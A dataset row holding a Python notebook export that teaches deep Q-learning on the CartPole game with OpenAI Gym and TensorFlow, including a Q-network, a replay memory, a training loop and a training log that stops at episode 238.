hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2d09d10838cadfefbbcfa8cf8df881bb3dadde80 | 67,417 | py | Python | capstone-project/Q-learning-cart.py | marcionicolau/personal_mle | 00510e2c275835d006c5794cf65d8a31ebab921c | [
"MIT"
] | null | null | null | capstone-project/Q-learning-cart.py | marcionicolau/personal_mle | 00510e2c275835d006c5794cf65d8a31ebab921c | [
"MIT"
] | null | null | null | capstone-project/Q-learning-cart.py | marcionicolau/personal_mle | 00510e2c275835d006c5794cf65d8a31ebab921c | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# # Deep $Q$-learning
#
# In this notebook, we'll build a neural network that can learn to play games through reinforcement learning. More specifically, we'll use $Q$-learning to train an agent to play a game called [Cart-Pole](https://gym.openai.com/envs/CartPole-v0). In this game, a freely swinging pole is attached to a cart. The cart can move to the left and right, and the goal is to keep the pole upright as long as possible.
#
# 
#
# We can simulate this game using [OpenAI Gym](https://github.com/openai/gym). First, let's check out how OpenAI Gym works. Then, we'll get into training an agent to play the Cart-Pole game.
# In[10]:
import gym
import numpy as np
import sys
# Create the Cart-Pole game environment
env = gym.make('CartPole-v1')
# Number of possible actions
print('Number of possible actions:', env.action_space.n)
# In[ ]:
[2018-01-22 23:10:02,350] Making new env: CartPole-v1
Number of possible actions: 2
# We interact with the simulation through `env`. You can see how many actions are possible from `env.action_space.n`, and to get a random action you can use `env.action_space.sample()`. Passing in an action as an integer to `env.step` will generate the next step in the simulation. This is general to all Gym games.
#
# In the Cart-Pole game, there are two possible actions, moving the cart left or right. So there are two actions we can take, encoded as 0 and 1.
#
# Run the code below to interact with the environment.
# In[2]:
actions = [] # actions that the agent selects
rewards = [] # obtained rewards
state = env.reset()
while True:
action = env.action_space.sample() # choose a random action
state, reward, done, _ = env.step(action)
rewards.append(reward)
actions.append(action)
if done:
break
# We can look at the actions and rewards:
# In[3]:
print('Actions:', actions)
print('Rewards:', rewards)
# In[ ]:
Actions: [0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0]
Rewards: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
# The game resets after the pole has fallen past a certain angle. For each step while the game is running, it returns a reward of 1.0. The longer the game runs, the more reward we get. Then, our network's goal is to maximize the reward by keeping the pole vertical. It will do this by moving the cart to the left and the right.
#
# ## $Q$-Network
#
# To keep track of the action values, we'll use a neural network that accepts a state $s$ as input. The output will be $Q$-values for each available action $a$ (i.e., the output is **all** action values $Q(s,a)$ _corresponding to the input state $s$_).
#
# <img src="assets/q-network.png" width=550px>
#
# For this Cart-Pole game, the state has four values: the position and velocity of the cart, and the position and velocity of the pole. Thus, the neural network has **four inputs**, one for each value in the state, and **two outputs**, one for each possible action.
#
# As explored in the lesson, to get the training target, we'll first use the context provided by the state $s$ to choose an action $a$, then simulate the game using that action. This will get us the next state, $s'$, and the reward $r$. With that, we can calculate $\hat{Q}(s,a) = r + \gamma \max_{a'}{Q(s', a')}$. Then we update the weights by minimizing $(\hat{Q}(s,a) - Q(s,a))^2$.
#
# Below is one implementation of the $Q$-network. It uses two fully connected layers with ReLU activations. Two seems to be good enough, three might be better. Feel free to try it out.
# In[4]:
import tensorflow as tf
class QNetwork:
def __init__(self, learning_rate=0.01, state_size=4,
action_size=2, hidden_size=10,
name='QNetwork'):
# state inputs to the Q-network
with tf.variable_scope(name):
self.inputs_ = tf.placeholder(tf.float32, [None, state_size], name='inputs')
# One hot encode the actions to later choose the Q-value for the action
self.actions_ = tf.placeholder(tf.int32, [None], name='actions')
one_hot_actions = tf.one_hot(self.actions_, action_size)
# Target Q values for training
self.targetQs_ = tf.placeholder(tf.float32, [None], name='target')
# ReLU hidden layers
self.fc1 = tf.contrib.layers.fully_connected(self.inputs_, hidden_size)
self.fc2 = tf.contrib.layers.fully_connected(self.fc1, hidden_size)
# Linear output layer
self.output = tf.contrib.layers.fully_connected(self.fc2, action_size,
activation_fn=None)
### Train with loss (targetQ - Q)^2
# output has length 2, for two actions. This next line chooses
# one value from output (per row) according to the one-hot encoded actions.
self.Q = tf.reduce_sum(tf.multiply(self.output, one_hot_actions), axis=1)
self.loss = tf.reduce_mean(tf.square(self.targetQs_ - self.Q))
self.opt = tf.train.AdamOptimizer(learning_rate).minimize(self.loss)
# ## Experience replay
#
# Reinforcement learning algorithms can have stability issues due to correlations between states. To reduce correlations when training, we can store the agent's experiences and later draw a random mini-batch of those experiences to train on.
#
# Here, we'll create a `Memory` object that will store our experiences, our transitions $<s, a, r, s'>$. This memory will have a maximum capacity, so we can keep newer experiences in memory while getting rid of older experiences. Then, we'll sample a random mini-batch of transitions $<s, a, r, s'>$ and train on those.
#
# Below, I've implemented a `Memory` object. If you're unfamiliar with `deque`, this is a double-ended queue. You can think of it like a tube open on both sides. You can put objects in either side of the tube. But if it's full, adding anything more will push an object out the other side. This is a great data structure to use for the memory buffer.
# In[5]:
from collections import deque
class Memory():
def __init__(self, max_size=1000):
self.buffer = deque(maxlen=max_size)
def add(self, experience):
self.buffer.append(experience)
def sample(self, batch_size):
idx = np.random.choice(np.arange(len(self.buffer)),
size=batch_size,
replace=False)
return [self.buffer[ii] for ii in idx]
# ## $Q$-Learning training algorithm
#
# We will use the below algorithm to train the network. For this game, the goal is to keep the pole upright for 195 frames. So we can start a new episode once meeting that goal. The game ends if the pole tilts over too far, or if the cart moves too far the left or right. When a game ends, we'll start a new episode. Now, to train the agent:
#
# * Initialize the memory $D$
# * Initialize the action-value network $Q$ with random weights
# * **For** episode $\leftarrow 1$ **to** $M$ **do**
# * Observe $s_0$
# * **For** $t \leftarrow 0$ **to** $T-1$ **do**
# * With probability $\epsilon$ select a random action $a_t$, otherwise select $a_t = \mathrm{argmax}_a Q(s_t,a)$
# * Execute action $a_t$ in simulator and observe reward $r_{t+1}$ and new state $s_{t+1}$
# * Store transition $<s_t, a_t, r_{t+1}, s_{t+1}>$ in memory $D$
# * Sample random mini-batch from $D$: $<s_j, a_j, r_j, s'_j>$
# * Set $\hat{Q}_j = r_j$ if the episode ends at $j+1$, otherwise set $\hat{Q}_j = r_j + \gamma \max_{a'}{Q(s'_j, a')}$
# * Make a gradient descent step with loss $(\hat{Q}_j - Q(s_j, a_j))^2$
# * **endfor**
# * **endfor**
#
# You are welcome (and encouraged!) to take the time to extend this code to implement some of the improvements that we discussed in the lesson, to include fixed $Q$ targets, double DQNs, prioritized replay, and/or dueling networks.
#
# ## Hyperparameters
#
# One of the more difficult aspects of reinforcement learning is the large number of hyperparameters. Not only are we tuning the network, but we're tuning the simulation.
# In[6]:
train_episodes = 1000 # max number of episodes to learn from
max_steps = 200 # max steps in an episode
gamma = 0.99 # future reward discount
# Exploration parameters
explore_start = 1.0 # exploration probability at start
explore_stop = 0.01 # minimum exploration probability
decay_rate = 0.0001 # exponential decay rate for exploration prob
# Network parameters
hidden_size = 64 # number of units in each Q-network hidden layer
learning_rate = 0.0001 # Q-network learning rate
# Memory parameters
memory_size = 10000 # memory capacity
batch_size = 20 # experience mini-batch size
pretrain_length = batch_size # number experiences to pretrain the memory
# In[7]:
tf.reset_default_graph()
mainQN = QNetwork(name='main', hidden_size=hidden_size, learning_rate=learning_rate)
# ## Populate the experience memory
#
# Here we re-initialize the simulation and pre-populate the memory. The agent is taking random actions and storing the transitions in memory. This will help the agent with exploring the game.
# In[12]:
# Initialize the simulation
env.reset()
# Take one random step to get the pole and cart moving
state, reward, done, _ = env.step(env.action_space.sample())
memory = Memory(max_size=memory_size)
# Make a bunch of random actions and store the experiences
for ii in range(pretrain_length):
# Make a random action
action = env.action_space.sample()
next_state, reward, done, _ = env.step(action)
if done:
# The simulation fails so no next state
next_state = np.zeros(state.shape)
# Add experience to memory
memory.add((state, action, reward, next_state))
# Start new episode
env.reset()
# Take one random step to get the pole and cart moving
state, reward, done, _ = env.step(env.action_space.sample())
else:
# Add experience to memory
memory.add((state, action, reward, next_state))
state = next_state
# ## Training
#
# Below we'll train our agent.
# In[13]:
# Now train with experiences
saver = tf.train.Saver()
rewards_list = []
with tf.Session() as sess:
# Initialize variables
sess.run(tf.global_variables_initializer())
step = 0
for ep in range(1, train_episodes):
total_reward = 0
t = 0
while t < max_steps:
step += 1
# Uncomment this next line to watch the training
# env.render()
# Explore or Exploit
explore_p = explore_stop + (explore_start - explore_stop)*np.exp(-decay_rate*step)
if explore_p > np.random.rand():
# Make a random action
action = env.action_space.sample()
else:
# Get action from Q-network
feed = {mainQN.inputs_: state.reshape((1, *state.shape))}
Qs = sess.run(mainQN.output, feed_dict=feed)
action = np.argmax(Qs)
# Take action, get new state and reward
next_state, reward, done, _ = env.step(action)
total_reward += reward
if done:
# the episode ends so no next state
next_state = np.zeros(state.shape)
t = max_steps
print('\rEpisode: {}'.format(ep),
'Total reward: {}'.format(total_reward),
'Training loss: {:.4f}'.format(loss),
'Explore P: {:.4f}'.format(explore_p), end="")
sys.stdout.flush()
rewards_list.append((ep, total_reward))
# Add experience to memory
memory.add((state, action, reward, next_state))
# Start new episode
env.reset()
# Take one random step to get the pole and cart moving
state, reward, done, _ = env.step(env.action_space.sample())
else:
# Add experience to memory
memory.add((state, action, reward, next_state))
state = next_state
t += 1
# Sample mini-batch from memory
batch = memory.sample(batch_size)
states = np.array([each[0] for each in batch])
actions = np.array([each[1] for each in batch])
rewards = np.array([each[2] for each in batch])
next_states = np.array([each[3] for each in batch])
# Train network
target_Qs = sess.run(mainQN.output, feed_dict={mainQN.inputs_: next_states})
# Set target_Qs to 0 for states where episode ends
episode_ends = (next_states == np.zeros(states[0].shape)).all(axis=1)
target_Qs[episode_ends] = (0, 0)
targets = rewards + gamma * np.max(target_Qs, axis=1)
loss, _ = sess.run([mainQN.loss, mainQN.opt],
feed_dict={mainQN.inputs_: states,
mainQN.targetQs_: targets,
mainQN.actions_: actions})
saver.save(sess, "checkpoints/cartpole.ckpt")
# In[ ]:
Episode: 1 Total reward: 13.0 Training loss: 1.0202 Explore P: 0.9987
Episode: 2 Total reward: 13.0 Training loss: 1.0752 Explore P: 0.9974
Episode: 3 Total reward: 9.0 Training loss: 1.0600 Explore P: 0.9965
Episode: 4 Total reward: 17.0 Training loss: 1.0429 Explore P: 0.9949
Episode: 5 Total reward: 16.0 Training loss: 1.0519 Explore P: 0.9933
Episode: 6 Total reward: 15.0 Training loss: 1.0574 Explore P: 0.9918
Episode: 7 Total reward: 12.0 Training loss: 1.0889 Explore P: 0.9906
Episode: 8 Total reward: 27.0 Training loss: 1.0859 Explore P: 0.9880
Episode: 9 Total reward: 24.0 Training loss: 1.2007 Explore P: 0.9857
Episode: 10 Total reward: 17.0 Training loss: 1.1116 Explore P: 0.9840
Episode: 11 Total reward: 12.0 Training loss: 1.0739 Explore P: 0.9828
Episode: 12 Total reward: 25.0 Training loss: 1.0805 Explore P: 0.9804
Episode: 13 Total reward: 23.0 Training loss: 1.0628 Explore P: 0.9782
Episode: 14 Total reward: 31.0 Training loss: 1.0248 Explore P: 0.9752
Episode: 15 Total reward: 15.0 Training loss: 0.9859 Explore P: 0.9737
Episode: 16 Total reward: 12.0 Training loss: 1.0983 Explore P: 0.9726
Episode: 17 Total reward: 16.0 Training loss: 1.4343 Explore P: 0.9710
Episode: 18 Total reward: 21.0 Training loss: 1.2696 Explore P: 0.9690
Episode: 19 Total reward: 15.0 Training loss: 1.3542 Explore P: 0.9676
Episode: 20 Total reward: 15.0 Training loss: 1.2635 Explore P: 0.9661
Episode: 21 Total reward: 16.0 Training loss: 1.3648 Explore P: 0.9646
Episode: 22 Total reward: 43.0 Training loss: 1.6088 Explore P: 0.9605
Episode: 23 Total reward: 7.0 Training loss: 1.5027 Explore P: 0.9599
Episode: 24 Total reward: 13.0 Training loss: 1.7275 Explore P: 0.9586
Episode: 25 Total reward: 18.0 Training loss: 1.3902 Explore P: 0.9569
Episode: 26 Total reward: 27.0 Training loss: 2.5874 Explore P: 0.9544
Episode: 27 Total reward: 32.0 Training loss: 1.5907 Explore P: 0.9513
Episode: 28 Total reward: 17.0 Training loss: 2.1144 Explore P: 0.9497
Episode: 29 Total reward: 34.0 Training loss: 1.7340 Explore P: 0.9466
Episode: 30 Total reward: 18.0 Training loss: 2.5100 Explore P: 0.9449
Episode: 31 Total reward: 15.0 Training loss: 2.0166 Explore P: 0.9435
Episode: 32 Total reward: 11.0 Training loss: 1.8675 Explore P: 0.9424
Episode: 33 Total reward: 18.0 Training loss: 4.0481 Explore P: 0.9408
Episode: 34 Total reward: 10.0 Training loss: 4.0895 Explore P: 0.9398
Episode: 35 Total reward: 15.0 Training loss: 2.1252 Explore P: 0.9384
Episode: 36 Total reward: 14.0 Training loss: 4.7765 Explore P: 0.9371
Episode: 37 Total reward: 16.0 Training loss: 3.3848 Explore P: 0.9357
Episode: 38 Total reward: 21.0 Training loss: 3.9125 Explore P: 0.9337
Episode: 39 Total reward: 16.0 Training loss: 2.6183 Explore P: 0.9322
Episode: 40 Total reward: 20.0 Training loss: 5.4929 Explore P: 0.9304
Episode: 41 Total reward: 18.0 Training loss: 3.6606 Explore P: 0.9287
Episode: 42 Total reward: 17.0 Training loss: 4.5812 Explore P: 0.9272
Episode: 43 Total reward: 10.0 Training loss: 3.7633 Explore P: 0.9263
Episode: 44 Total reward: 8.0 Training loss: 4.6176 Explore P: 0.9255
Episode: 45 Total reward: 39.0 Training loss: 4.2732 Explore P: 0.9220
Episode: 46 Total reward: 18.0 Training loss: 4.0041 Explore P: 0.9203
Episode: 47 Total reward: 11.0 Training loss: 4.4035 Explore P: 0.9193
Episode: 48 Total reward: 25.0 Training loss: 5.4287 Explore P: 0.9171
Episode: 49 Total reward: 19.0 Training loss: 9.6972 Explore P: 0.9153
Episode: 50 Total reward: 11.0 Training loss: 16.3460 Explore P: 0.9143
Episode: 51 Total reward: 11.0 Training loss: 13.4854 Explore P: 0.9133
Episode: 52 Total reward: 12.0 Training loss: 12.8016 Explore P: 0.9123
Episode: 53 Total reward: 13.0 Training loss: 5.8589 Explore P: 0.9111
Episode: 54 Total reward: 12.0 Training loss: 8.5924 Explore P: 0.9100
Episode: 55 Total reward: 19.0 Training loss: 8.6204 Explore P: 0.9083
Episode: 56 Total reward: 36.0 Training loss: 14.2701 Explore P: 0.9051
Episode: 57 Total reward: 9.0 Training loss: 4.5481 Explore P: 0.9043
Episode: 58 Total reward: 22.0 Training loss: 12.9695 Explore P: 0.9023
Episode: 59 Total reward: 36.0 Training loss: 11.2639 Explore P: 0.8991
Episode: 60 Total reward: 16.0 Training loss: 7.7648 Explore P: 0.8977
Episode: 61 Total reward: 31.0 Training loss: 4.6997 Explore P: 0.8949
Episode: 62 Total reward: 13.0 Training loss: 5.9755 Explore P: 0.8938
Episode: 63 Total reward: 10.0 Training loss: 39.1040 Explore P: 0.8929
Episode: 64 Total reward: 14.0 Training loss: 23.2767 Explore P: 0.8917
Episode: 65 Total reward: 12.0 Training loss: 9.3477 Explore P: 0.8906
Episode: 66 Total reward: 20.0 Training loss: 6.4336 Explore P: 0.8888
Episode: 67 Total reward: 29.0 Training loss: 17.1522 Explore P: 0.8863
Episode: 68 Total reward: 13.0 Training loss: 39.3250 Explore P: 0.8852
Episode: 69 Total reward: 20.0 Training loss: 6.2099 Explore P: 0.8834
Episode: 70 Total reward: 15.0 Training loss: 20.9229 Explore P: 0.8821
Episode: 71 Total reward: 27.0 Training loss: 24.7817 Explore P: 0.8797
Episode: 72 Total reward: 12.0 Training loss: 20.7842 Explore P: 0.8787
Episode: 73 Total reward: 15.0 Training loss: 12.3202 Explore P: 0.8774
Episode: 74 Total reward: 31.0 Training loss: 9.2270 Explore P: 0.8747
Episode: 75 Total reward: 13.0 Training loss: 19.8264 Explore P: 0.8736
Episode: 76 Total reward: 20.0 Training loss: 72.9411 Explore P: 0.8719
Episode: 77 Total reward: 27.0 Training loss: 5.2214 Explore P: 0.8695
Episode: 78 Total reward: 14.0 Training loss: 39.3913 Explore P: 0.8683
Episode: 79 Total reward: 16.0 Training loss: 7.9491 Explore P: 0.8670
Episode: 80 Total reward: 18.0 Training loss: 10.8364 Explore P: 0.8654
Episode: 81 Total reward: 16.0 Training loss: 22.2031 Explore P: 0.8641
Episode: 82 Total reward: 21.0 Training loss: 23.6590 Explore P: 0.8623
Episode: 83 Total reward: 13.0 Training loss: 8.4819 Explore P: 0.8612
Episode: 84 Total reward: 10.0 Training loss: 13.3548 Explore P: 0.8603
Episode: 85 Total reward: 13.0 Training loss: 18.0272 Explore P: 0.8592
Episode: 86 Total reward: 24.0 Training loss: 42.1243 Explore P: 0.8572
Episode: 87 Total reward: 9.0 Training loss: 30.8526 Explore P: 0.8564
Episode: 88 Total reward: 22.0 Training loss: 36.6084 Explore P: 0.8546
Episode: 89 Total reward: 7.0 Training loss: 10.5430 Explore P: 0.8540
Episode: 90 Total reward: 12.0 Training loss: 25.5808 Explore P: 0.8529
Episode: 91 Total reward: 17.0 Training loss: 47.3073 Explore P: 0.8515
Episode: 92 Total reward: 21.0 Training loss: 7.9998 Explore P: 0.8498
Episode: 93 Total reward: 15.0 Training loss: 66.6464 Explore P: 0.8485
Episode: 94 Total reward: 17.0 Training loss: 95.6354 Explore P: 0.8471
Episode: 95 Total reward: 23.0 Training loss: 57.4714 Explore P: 0.8451
Episode: 96 Total reward: 11.0 Training loss: 40.7717 Explore P: 0.8442
Episode: 97 Total reward: 13.0 Training loss: 43.3380 Explore P: 0.8431
Episode: 98 Total reward: 9.0 Training loss: 10.8368 Explore P: 0.8424
Episode: 99 Total reward: 21.0 Training loss: 57.7325 Explore P: 0.8406
Episode: 100 Total reward: 11.0 Training loss: 9.7291 Explore P: 0.8397
Episode: 101 Total reward: 10.0 Training loss: 10.4052 Explore P: 0.8389
Episode: 102 Total reward: 26.0 Training loss: 60.4829 Explore P: 0.8368
Episode: 103 Total reward: 34.0 Training loss: 9.0924 Explore P: 0.8339
Episode: 104 Total reward: 30.0 Training loss: 178.0664 Explore P: 0.8315
Episode: 105 Total reward: 14.0 Training loss: 9.0423 Explore P: 0.8303
Episode: 106 Total reward: 18.0 Training loss: 126.9380 Explore P: 0.8289
Episode: 107 Total reward: 11.0 Training loss: 58.9921 Explore P: 0.8280
Episode: 108 Total reward: 20.0 Training loss: 9.1945 Explore P: 0.8263
Episode: 109 Total reward: 9.0 Training loss: 9.2887 Explore P: 0.8256
Episode: 110 Total reward: 29.0 Training loss: 20.7970 Explore P: 0.8232
Episode: 111 Total reward: 17.0 Training loss: 144.6258 Explore P: 0.8218
Episode: 112 Total reward: 15.0 Training loss: 82.4089 Explore P: 0.8206
Episode: 113 Total reward: 15.0 Training loss: 39.9963 Explore P: 0.8194
Episode: 114 Total reward: 8.0 Training loss: 9.8394 Explore P: 0.8188
Episode: 115 Total reward: 29.0 Training loss: 76.9930 Explore P: 0.8164
Episode: 116 Total reward: 21.0 Training loss: 25.0172 Explore P: 0.8147
Episode: 117 Total reward: 24.0 Training loss: 143.5481 Explore P: 0.8128
Episode: 118 Total reward: 35.0 Training loss: 86.5429 Explore P: 0.8100
Episode: 119 Total reward: 28.0 Training loss: 8.4315 Explore P: 0.8078
Episode: 120 Total reward: 13.0 Training loss: 25.7062 Explore P: 0.8067
Episode: 121 Total reward: 9.0 Training loss: 6.5005 Explore P: 0.8060
Episode: 122 Total reward: 32.0 Training loss: 90.7984 Explore P: 0.8035
Episode: 123 Total reward: 21.0 Training loss: 130.2779 Explore P: 0.8018
Episode: 124 Total reward: 15.0 Training loss: 167.6294 Explore P: 0.8006
Episode: 125 Total reward: 15.0 Training loss: 74.7611 Explore P: 0.7994
Episode: 126 Total reward: 20.0 Training loss: 119.3178 Explore P: 0.7978
Episode: 127 Total reward: 18.0 Training loss: 196.5175 Explore P: 0.7964
Episode: 128 Total reward: 8.0 Training loss: 45.2131 Explore P: 0.7958
Episode: 129 Total reward: 24.0 Training loss: 86.0374 Explore P: 0.7939
Episode: 130 Total reward: 11.0 Training loss: 7.8129 Explore P: 0.7931
Episode: 131 Total reward: 11.0 Training loss: 76.8442 Explore P: 0.7922
Episode: 132 Total reward: 28.0 Training loss: 196.6863 Explore P: 0.7900
Episode: 133 Total reward: 9.0 Training loss: 45.7586 Explore P: 0.7893
Episode: 134 Total reward: 21.0 Training loss: 5.8484 Explore P: 0.7877
Episode: 135 Total reward: 10.0 Training loss: 7.3919 Explore P: 0.7869
Episode: 136 Total reward: 17.0 Training loss: 12.3142 Explore P: 0.7856
Episode: 137 Total reward: 16.0 Training loss: 75.7170 Explore P: 0.7843
Episode: 138 Total reward: 12.0 Training loss: 145.3568 Explore P: 0.7834
Episode: 139 Total reward: 27.0 Training loss: 121.1114 Explore P: 0.7813
Episode: 140 Total reward: 26.0 Training loss: 7.3243 Explore P: 0.7793
Episode: 141 Total reward: 40.0 Training loss: 10.6523 Explore P: 0.7762
Episode: 142 Total reward: 14.0 Training loss: 6.9482 Explore P: 0.7752
Episode: 143 Total reward: 24.0 Training loss: 137.7784 Explore P: 0.7733
Episode: 144 Total reward: 12.0 Training loss: 98.8381 Explore P: 0.7724
Episode: 145 Total reward: 8.0 Training loss: 14.1739 Explore P: 0.7718
Episode: 146 Total reward: 51.0 Training loss: 69.1545 Explore P: 0.7679
Episode: 147 Total reward: 29.0 Training loss: 249.9989 Explore P: 0.7657
Episode: 148 Total reward: 9.0 Training loss: 140.8663 Explore P: 0.7651
Episode: 149 Total reward: 13.0 Training loss: 141.5930 Explore P: 0.7641
Episode: 150 Total reward: 19.0 Training loss: 12.6228 Explore P: 0.7627
Episode: 151 Total reward: 19.0 Training loss: 136.3315 Explore P: 0.7612
Episode: 152 Total reward: 10.0 Training loss: 110.3699 Explore P: 0.7605
Episode: 153 Total reward: 18.0 Training loss: 8.3900 Explore P: 0.7591
Episode: 154 Total reward: 18.0 Training loss: 96.3717 Explore P: 0.7578
Episode: 155 Total reward: 7.0 Training loss: 6.0889 Explore P: 0.7573
Episode: 156 Total reward: 15.0 Training loss: 126.7419 Explore P: 0.7561
Episode: 157 Total reward: 15.0 Training loss: 67.2544 Explore P: 0.7550
Episode: 158 Total reward: 26.0 Training loss: 12.2839 Explore P: 0.7531
Episode: 159 Total reward: 20.0 Training loss: 5.8118 Explore P: 0.7516
Episode: 160 Total reward: 10.0 Training loss: 96.4570 Explore P: 0.7509
Episode: 161 Total reward: 23.0 Training loss: 7.6207 Explore P: 0.7492
Episode: 162 Total reward: 18.0 Training loss: 66.5249 Explore P: 0.7478
Episode: 163 Total reward: 18.0 Training loss: 111.3273 Explore P: 0.7465
Episode: 164 Total reward: 21.0 Training loss: 11.5292 Explore P: 0.7450
Episode: 165 Total reward: 17.0 Training loss: 6.3130 Explore P: 0.7437
Episode: 166 Total reward: 22.0 Training loss: 153.8167 Explore P: 0.7421
Episode: 167 Total reward: 17.0 Training loss: 7.0915 Explore P: 0.7408
Episode: 168 Total reward: 34.0 Training loss: 228.3831 Explore P: 0.7384
Episode: 169 Total reward: 13.0 Training loss: 8.5996 Explore P: 0.7374
Episode: 170 Total reward: 13.0 Training loss: 90.8898 Explore P: 0.7365
Episode: 171 Total reward: 20.0 Training loss: 4.8179 Explore P: 0.7350
Episode: 172 Total reward: 9.0 Training loss: 6.2508 Explore P: 0.7344
Episode: 173 Total reward: 14.0 Training loss: 5.2401 Explore P: 0.7334
Episode: 174 Total reward: 12.0 Training loss: 3.9268 Explore P: 0.7325
Episode: 175 Total reward: 12.0 Training loss: 5.6376 Explore P: 0.7316
Episode: 176 Total reward: 11.0 Training loss: 44.5308 Explore P: 0.7308
Episode: 177 Total reward: 12.0 Training loss: 4.9717 Explore P: 0.7300
Episode: 178 Total reward: 9.0 Training loss: 181.0085 Explore P: 0.7293
Episode: 179 Total reward: 11.0 Training loss: 73.1134 Explore P: 0.7285
Episode: 180 Total reward: 13.0 Training loss: 87.3085 Explore P: 0.7276
Episode: 181 Total reward: 12.0 Training loss: 121.6627 Explore P: 0.7267
Episode: 182 Total reward: 12.0 Training loss: 58.1967 Explore P: 0.7259
Episode: 183 Total reward: 13.0 Training loss: 85.1540 Explore P: 0.7249
Episode: 184 Total reward: 16.0 Training loss: 5.1214 Explore P: 0.7238
Episode: 185 Total reward: 19.0 Training loss: 69.1839 Explore P: 0.7224
Episode: 186 Total reward: 7.0 Training loss: 63.2256 Explore P: 0.7219
Episode: 187 Total reward: 17.0 Training loss: 73.2788 Explore P: 0.7207
Episode: 188 Total reward: 15.0 Training loss: 78.6213 Explore P: 0.7197
Episode: 189 Total reward: 11.0 Training loss: 88.5211 Explore P: 0.7189
Episode: 190 Total reward: 14.0 Training loss: 60.1332 Explore P: 0.7179
Episode: 191 Total reward: 15.0 Training loss: 135.7724 Explore P: 0.7168
Episode: 192 Total reward: 15.0 Training loss: 156.9691 Explore P: 0.7158
Episode: 193 Total reward: 17.0 Training loss: 93.3756 Explore P: 0.7146
Episode: 194 Total reward: 12.0 Training loss: 3.0462 Explore P: 0.7137
Episode: 195 Total reward: 9.0 Training loss: 119.2650 Explore P: 0.7131
Episode: 196 Total reward: 13.0 Training loss: 66.6383 Explore P: 0.7122
Episode: 197 Total reward: 9.0 Training loss: 113.7849 Explore P: 0.7116
Episode: 198 Total reward: 13.0 Training loss: 54.6072 Explore P: 0.7106
Episode: 199 Total reward: 19.0 Training loss: 54.8980 Explore P: 0.7093
Episode: 200 Total reward: 20.0 Training loss: 155.5480 Explore P: 0.7079
Episode: 201 Total reward: 10.0 Training loss: 45.8685 Explore P: 0.7072
Episode: 202 Total reward: 14.0 Training loss: 53.5145 Explore P: 0.7062
Episode: 203 Total reward: 8.0 Training loss: 107.9623 Explore P: 0.7057
Episode: 204 Total reward: 21.0 Training loss: 40.2749 Explore P: 0.7042
Episode: 205 Total reward: 32.0 Training loss: 43.2627 Explore P: 0.7020
Episode: 206 Total reward: 9.0 Training loss: 55.5398 Explore P: 0.7014
Episode: 207 Total reward: 15.0 Training loss: 1.9959 Explore P: 0.7004
Episode: 208 Total reward: 12.0 Training loss: 105.3751 Explore P: 0.6995
Episode: 209 Total reward: 11.0 Training loss: 40.8319 Explore P: 0.6988
Episode: 210 Total reward: 10.0 Training loss: 89.7147 Explore P: 0.6981
Episode: 211 Total reward: 10.0 Training loss: 1.1946 Explore P: 0.6974
Episode: 212 Total reward: 10.0 Training loss: 80.6916 Explore P: 0.6967
Episode: 213 Total reward: 24.0 Training loss: 88.0977 Explore P: 0.6951
Episode: 214 Total reward: 14.0 Training loss: 46.4105 Explore P: 0.6941
Episode: 215 Total reward: 11.0 Training loss: 40.3726 Explore P: 0.6933
Episode: 216 Total reward: 11.0 Training loss: 3.0770 Explore P: 0.6926
Episode: 217 Total reward: 8.0 Training loss: 1.7495 Explore P: 0.6921
Episode: 218 Total reward: 16.0 Training loss: 1.5615 Explore P: 0.6910
Episode: 219 Total reward: 17.0 Training loss: 2.0250 Explore P: 0.6898
Episode: 220 Total reward: 18.0 Training loss: 37.8432 Explore P: 0.6886
Episode: 221 Total reward: 17.0 Training loss: 1.9049 Explore P: 0.6874
Episode: 222 Total reward: 16.0 Training loss: 1.9652 Explore P: 0.6863
Episode: 223 Total reward: 16.0 Training loss: 1.4384 Explore P: 0.6853
Episode: 224 Total reward: 27.0 Training loss: 66.0615 Explore P: 0.6834
Episode: 225 Total reward: 9.0 Training loss: 0.8478 Explore P: 0.6828
Episode: 226 Total reward: 14.0 Training loss: 1.0319 Explore P: 0.6819
Episode: 227 Total reward: 17.0 Training loss: 97.6957 Explore P: 0.6808
Episode: 228 Total reward: 8.0 Training loss: 68.0521 Explore P: 0.6802
Episode: 229 Total reward: 9.0 Training loss: 110.8437 Explore P: 0.6796
Episode: 230 Total reward: 19.0 Training loss: 1.6856 Explore P: 0.6783
Episode: 231 Total reward: 9.0 Training loss: 2.0634 Explore P: 0.6777
Episode: 232 Total reward: 11.0 Training loss: 32.0714 Explore P: 0.6770
Episode: 233 Total reward: 9.0 Training loss: 2.0387 Explore P: 0.6764
Episode: 234 Total reward: 13.0 Training loss: 66.9349 Explore P: 0.6755
Episode: 235 Total reward: 14.0 Training loss: 110.6725 Explore P: 0.6746
Episode: 236 Total reward: 18.0 Training loss: 1.0585 Explore P: 0.6734
Episode: 237 Total reward: 11.0 Training loss: 117.0101 Explore P: 0.6727
Episode: 238 Total reward: 7.0 Training loss: 2.6115 Explore P: 0.6722
